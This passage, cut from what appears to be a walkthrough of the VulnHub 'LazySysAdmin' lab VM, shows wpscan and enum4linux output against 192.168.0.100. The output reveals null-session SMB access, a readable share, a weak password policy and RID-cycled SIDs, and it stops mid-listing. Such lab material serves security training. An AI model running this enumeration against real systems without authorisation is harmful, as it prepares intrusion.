0.1px;"> |  Last updated: 2017-11-16T00:00:00.000Z</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> |  Location: http://192.168.0.100/wordpress/wp-content/themes/twentyfifteen/</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> |  Readme: http://192.168.0.100/wordpress/wp-content/themes/twentyfifteen/readme.txt</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[!] 
The version is out of date, the latest version is 1.9</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> |  Style URL: http://192.168.0.100/wordpress/wp-content/themes/twentyfifteen/style.css</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> |  Theme Name: Twenty Fifteen</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> |  Theme URI: https://wordpress.org/themes/twentyfifteen/</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> |  Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple,...</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> |  Author: the WordPress team</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> |  Author URI: https://wordpress.org/</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] Enumerating plugins from passive detection ...</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] No plugins found</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] Finished: Thu Feb  1 01:37:24 2018</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" 
style="padding-right: 0.1px;">[+] Requests Done: 356</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] Memory used: 37.98 MB</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] Elapsed time: 00:00:04</span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 1273px;"></div><div class="CodeMirror-gutters" style="display: none; height: 1303px;"></div></div></div></pre><p> </p><p><img src='https://mochazz.github.io/img/vulnhub-LazySysAdmin/6.png' alt='6' referrerPolicy='no-referrer' /></p><p>enum4linux 192.168.0.100</p><pre class="md-fences md-end-block" lang="bash" style="break-inside: unset;"> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation" style=""><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span 
role="presentation" style="padding-right: 0.1px;">Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Feb  <span class="cm-number">1</span> <span class="cm-number">00</span>:46:08 <span class="cm-number">2018</span></span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">==========================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|    Target Information    |</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">==========================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Target ........... <span class="cm-number">192</span>.168.0.100</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">RID Range ........ <span class="cm-number">500</span><span class="cm-attribute">-550</span>,1000-1050</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Username ......... <span class="cm-string">''</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Password ......... <span class="cm-string">''</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Known Usernames .. 
administrator, guest, krbtgt, domain admins, root, bin, none</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">=====================================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|    Enumerating Workgroup/Domain on <span class="cm-number">192</span>.168.0.100    |</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">=====================================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Got domain/workgroup name: WORKGROUP</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">=============================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|    Nbtstat Information <span class="cm-keyword">for</span> <span class="cm-number">192</span>.168.0.100    |</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">=============================================</span> </span></pre><pre class=" CodeMirror-line " 
role="presentation"><span role="presentation" style="padding-right: 0.1px;">Looking up status of <span class="cm-number">192</span>.168.0.100</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="   ">    </span>LAZYSYSADMIN    <00> <span class="cm-attribute">-</span>         B <ACTIVE>  Workstation Service</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="    ">    </span>LAZYSYSADMIN    <03> <span class="cm-attribute">-</span>         B <ACTIVE>  Messenger Service</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="  ">    </span>LAZYSYSADMIN    <20> <span class="cm-attribute">-</span>         B <ACTIVE>  File Server Service</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="    ">    </span>WORKGROUP       <00> <span class="cm-attribute">-</span> <GROUP> B <ACTIVE>  Domain/Workgroup Name</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="  ">    </span>WORKGROUP       <1e> <span class="cm-attribute">-</span> <GROUP> B <ACTIVE>  Browser Service Elections</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text=" ">    </span>MAC Address <span class="cm-operator">=</span> <span class="cm-number">00</span><span 
class="cm-attribute">-00-00-00-00-00</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">======================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|    Session Check on <span class="cm-number">192</span>.168.0.100    |</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">======================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Server <span class="cm-number">192</span>.168.0.100 allows sessions using username <span class="cm-string">''</span>, password <span class="cm-string">''</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">============================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|    Getting domain SID <span class="cm-keyword">for</span> <span class="cm-number">192</span>.168.0.100    |</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">============================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Domain Name: 
WORKGROUP</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Domain Sid: (NULL SID)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Can<span class="cm-string">'t determine if host is part of domain or part of a workgroup</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">=======================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|    OS information on <span class="cm-number">192</span>.168.0.100    |</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">=======================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Got OS info <span class="cm-keyword">for</span> <span class="cm-number">192</span>.168.0.100 from smbclient: </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Got OS info <span class="cm-keyword">for</span> <span class="cm-number">192</span>.168.0.100 from srvinfo:</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text=" ">    </span>LAZYSYSADMIN   Wk Sv PrQ Unx NT SNT Web server</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 
0.1px;"><span class="cm-tab" role="presentation" cm-text="  ">    </span>platform_id     :<span class="cm-tab" role="presentation" cm-text="  ">   </span><span class="cm-number">500</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="    ">    </span>os version      :<span class="cm-tab" role="presentation" cm-text="  ">   </span><span class="cm-number">6</span>.1</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="    ">    </span>server type     :<span class="cm-tab" role="presentation" cm-text="  ">   </span>0x809a03</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">==============================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|    Users on <span class="cm-number">192</span>.168.0.100    |</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">==============================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">==========================================</span> </span></pre><pre class=" CodeMirror-line " 
role="presentation"><span role="presentation" style="padding-right: 0.1px;">|    Share Enumeration on <span class="cm-number">192</span>.168.0.100    |</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">==========================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">WARNING: The <span class="cm-string">"syslog"</span> option is deprecated</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="   ">    </span>Sharename       Type      Comment</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="   ">    </span><span class="cm-attribute">---------</span>       <span class="cm-attribute">----</span>      <span class="cm-attribute">-------</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="    ">    </span>print<span class="cm-def">$ </span>         Disk      Printer Drivers</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="  ">    </span>share<span class="cm-def">$ </span>         Disk      Sumshare</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text=" ">    </span>IPC<span class="cm-def">$ </span>           IPC       IPC Service (Web 
server)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Reconnecting with SMB1 <span class="cm-keyword">for</span> workgroup listing.</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text=" ">    </span>Server               Comment</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="  ">    </span><span class="cm-attribute">---------</span>            <span class="cm-attribute">-------</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="  ">    </span>Workgroup            Master</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text=" ">    </span><span class="cm-attribute">---------</span>            <span class="cm-attribute">-------</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="   ">    </span>WORKGROUP            </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Attempting 
to map shares on <span class="cm-number">192</span>.168.0.100</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">//192.168.0.100/print<span class="cm-def">$<span class="cm-tab" role="presentation" cm-text="   ">  </span>Mapping</span>: DENIED, Listing: N/A</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">//192.168.0.100/share<span class="cm-def">$<span class="cm-tab" role="presentation" cm-text="    ">  </span>Mapping</span>: OK, Listing: OK</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">//192.168.0.100/IPC<span class="cm-def">$<span class="cm-tab" role="presentation" cm-text="   ">    </span></span>[E] Can<span class="cm-string">'t understand response:</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">WARNING: The <span class="cm-string">"syslog"</span> option is deprecated</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">=====================================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|    Password Policy Information <span class="cm-keyword">for</span> <span class="cm-number">192</span>.168.0.100    |</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span 
class="cm-operator">=====================================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Attaching to <span class="cm-number">192</span>.168.0.100 using a NULL share</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Trying protocol <span class="cm-number">445</span>/SMB...</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Found domain(s):</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="  ">    </span>[<span class="cm-operator">+</span>] LAZYSYSADMIN</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="    ">    </span>[<span class="cm-operator">+</span>] Builtin</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" 
style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Password Info <span class="cm-keyword">for</span> Domain: LAZYSYSADMIN</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="    ">    </span>[<span class="cm-operator">+</span>] Minimum password length: <span class="cm-number">5</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="   ">    </span>[<span class="cm-operator">+</span>] Password history length: None</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="   ">    </span>[<span class="cm-operator">+</span>] Maximum password age: Not Set</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="   ">    </span>[<span class="cm-operator">+</span>] Password Complexity Flags: <span class="cm-number">000000</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="   ">    </span><span class="cm-tab" role="presentation" cm-text=" ">    </span>[<span class="cm-operator">+</span>] Domain Refuse Password Change: <span 
class="cm-number">0</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text=" ">    </span><span class="cm-tab" role="presentation" cm-text=" ">    </span>[<span class="cm-operator">+</span>] Domain Password Store Cleartext: <span class="cm-number">0</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="   ">    </span><span class="cm-tab" role="presentation" cm-text=" ">    </span>[<span class="cm-operator">+</span>] Domain Password Lockout Admins: <span class="cm-number">0</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="    ">    </span><span class="cm-tab" role="presentation" cm-text=" ">    </span>[<span class="cm-operator">+</span>] Domain Password No Clear Change: <span class="cm-number">0</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="   ">    </span><span class="cm-tab" role="presentation" cm-text=" ">    </span>[<span class="cm-operator">+</span>] Domain Password No Anon Change: <span class="cm-number">0</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="    ">    </span><span class="cm-tab" role="presentation" cm-text=" ">    </span>[<span class="cm-operator">+</span>] Domain Password Complex: <span class="cm-number">0</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span 
role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="  ">    </span>[<span class="cm-operator">+</span>] Minimum password age: None</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="  ">    </span>[<span class="cm-operator">+</span>] Reset Account Lockout Counter: <span class="cm-number">30</span> minutes </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="   ">    </span>[<span class="cm-operator">+</span>] Locked Account Duration: <span class="cm-number">30</span> minutes </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text=" ">    </span>[<span class="cm-operator">+</span>] Account Lockout Threshold: None</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text=" ">    </span>[<span class="cm-operator">+</span>] Forced Log off Time: Not Set</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Retieved partial password policy with rpcclient:</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" 
style="padding-right: 0.1px;">Password Complexity: Disabled</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Minimum Password Length: <span class="cm-number">5</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">===============================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|    Groups on <span class="cm-number">192</span>.168.0.100    |</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">===============================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Getting builtin groups:</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Getting builtin group memberships:</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 
0.1px;">[<span class="cm-operator">+</span>] Getting local groups:</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Getting local group memberships:</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Getting domain groups:</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Getting domain group memberships:</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">========================================================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|    Users on <span class="cm-number">192</span>.168.0.100 via RID cycling (RIDS: <span class="cm-number">500</span><span class="cm-attribute">-550</span>,1000-1050)    |</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">========================================================================</span> </span></pre><pre class=" CodeMirror-line " 
role="presentation"><span role="presentation" style="padding-right: 0.1px;">[I] Found new SID: S-1-22-1</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[I] Found new SID: S-1-5-21-2952042175-1524911573-1237092750</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[I] Found new SID: S-1-5-32</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Enumerating users using SID S-1-5-32 and logon username <span class="cm-string">''</span>, password <span class="cm-string">''</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-5-32-500 *unknown*\*unknown* (8)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-5-32-544 BUILTIN\Administrators (Local Group)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-5-32-545 BUILTIN\Users (Local Group)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-5-32-546 BUILTIN\Guests (Local Group)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-5-32-547 BUILTIN\Power Users (Local Group)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-5-32-548 BUILTIN\Account Operators (Local Group)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-5-32-549 BUILTIN\Server 
